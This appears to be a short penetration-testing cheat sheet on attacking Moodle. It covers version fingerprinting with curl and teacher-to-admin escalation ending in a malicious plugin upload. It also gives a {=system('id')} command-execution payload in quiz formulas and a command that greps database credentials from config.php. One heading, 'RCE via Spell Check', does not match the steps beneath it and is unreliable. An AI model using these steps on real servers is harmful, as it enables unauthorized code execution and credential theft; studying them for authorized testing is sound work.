Moodle

What it is: Open-source learning management system (LMS) used by universities and schools. Found on educational targets. Admin accounts can execute PHP code through plugins and themes.

Default ports: 80, 443

Vuln research:


Identify Moodle version

Check specific paths and source code

curl -s http://$IP/ | grep "moodle"
curl -s http://$IP/lib/upgrade.txt | head -5
curl -s http://$IP/theme/upgrade.txt | head -5
# Admin login: /login/index.php

Moodle RCE via Spell Check (CVE-2020-14321)

Teacher role escalation to admin → RCE — Moodle < 3.9

# Requires teacher account
# Enrol yourself as manager in a course → gain admin
# Then: Site Administration → Plugins → Install plugins → Upload malicious plugin ZIP

Moodle RCE via calculated questions

If you have teacher or admin access — PHP code execution

# Quiz → Add Question → Calculated
# In answer formula: {=system('id')}
# Or use the Tex filter if enabled for command execution

Moodle config.php

Database credentials in plaintext

cat /var/www/html/moodle/config.php | grep -E "(dbhost|dbname|dbuser|dbpass)"
Example Output
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'moodle_admin';
$CFG->dbpass    = 'M00dle_Pass!';